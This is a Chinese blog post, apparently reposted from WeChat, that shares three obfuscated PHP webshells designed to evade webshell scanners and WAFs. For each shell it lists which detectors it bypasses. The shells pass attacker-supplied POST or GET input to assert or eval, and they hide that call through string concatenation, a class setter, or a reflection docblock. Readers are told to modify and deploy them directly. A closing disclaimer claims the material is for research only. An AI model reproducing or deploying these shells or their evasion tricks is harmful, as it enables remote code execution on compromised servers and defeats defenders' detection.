前言:最近有在系统的总计waf绕过内容和后缀的绕过。
在这个过程中发觉其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了一些waf
内容的还没写完 东西有点多
这里就分享一些php免杀的马 直接改即可 全过的也有贼多 但是暂时就不分享了 后面应该会分享一些asp和jsp的
版本限制
使用条件:版本<7.1可用
这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)
马内容:
<?php
class get{
public $x="";
public $y="";
public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>
bypass情况:
最新版D盾
长亭
百度没过
在线的 这个不建议使用 效果就离谱 其他都能查出的他不行
河马
版本未限制的
马1(这个只过了d盾 不太理解这个d盾为啥不查)
内容:
<?php
/**
* assert($_GET[1+0]);
*/
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
eval($d);
?>
d盾
长亭
百度
河马也不过
马2
马内容:
<?php
class get{
public $x="";
public $y="";
public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);
bypass情况:
除百度其他的都过了
d盾
长亭的
百度
河马
原文始发于微信公众号(goddemon的小屋):php webshell免杀马
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论